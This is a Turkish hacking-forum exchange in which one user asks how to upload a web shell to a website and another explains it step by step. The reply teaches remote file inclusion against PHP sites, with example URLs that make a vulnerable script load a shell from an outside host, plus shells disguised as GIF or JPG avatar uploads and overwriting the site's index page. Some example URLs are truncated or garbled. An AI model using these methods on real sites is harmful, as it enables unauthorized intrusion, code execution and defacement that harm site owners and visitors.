soru=arkadaşlar bir siteye shell nasıl upload edilir bunu açıklamalarıyla öğretebilecek bir kardeşimiz varmı acaba şimdiden hepinize teşekür ederim

nasıl sızın adınıza ıyı sorular soruyorum degılmı

cevap=1.Si en kolay yöntem rfi dir remote file include

Php de webmasterların coderların denyoluğundan kaynaklanan açıkla kendi shellimiiizi upload etmiş gibi o script üzerinden çağırırız

http://www.xxx.com/acikolanscript?ro....by.ru/99.php?



gif ten ziyade .jpg uzantısı kullanırlar ama bunu avatara koymak zordur çünkü genellikle avatar upload kb limitini az tutarlar ve shell genellikle bunu aşar,ayrıca oraya upload etsende sitenin onu hangi dosyanın içine upload ettiğini bilmen gerekir

http://www.xxx.com/acikolanscript?ro....by.ru/99.php?

bunuda açıklarsak bu bir rfi açığıdır ve yazımı çok kolaydır kodlama hatalarından olur mesela sitenin config.php sinde bir script hatası var mesela önceden tanımlanmamış bir değişkeni pat diye kullanmış bunlar genellikle include,require filan gibi şeylerden sonra parantez içinde $hatalıscript şeklinde bulunur sizde bunu şu şekilde kullanırsınız

http://www.siteadresi.com/config.php...pt=shelladresi

eğer bu şekilde yazarsanız ve sitenin sahibi bu açığı yamamamışsa siteye hooop diye dalarsınız gerisi etkili shell kullanımına ve size verilen izinlere kalmış



örnek olarak bu? böyle yapınca servera shell atmış gibi girer sonra shellimiizi gerçekten upload ederiz veya böyle işlemlere devam ederiz.

2. olarak bazı siteler resim yükletir avatar falan bizde avatar yerine shellimiizi sokarız tabi bu or yöntemdir bunu uygulamak içn gif formatına çevrilmiş sheller mevcuttur


sole acıklasam sanırım daha ıyı bır sekılde anlarsın ornek olarak sıtemız su:
www.Lg.com/Mavera=%02admın
bız shellımızı calıstırmak için sıtenıjn uzantısını''='' kadar sılıyoruz daha sonra Shell adresımızı yazıyoruz.daha sonra Yesıl dızınlı olan yerlere yazma yetkımız vardır.ındex dosyası yesıl ıse buraya ındexımızı atıyoruz bu kadar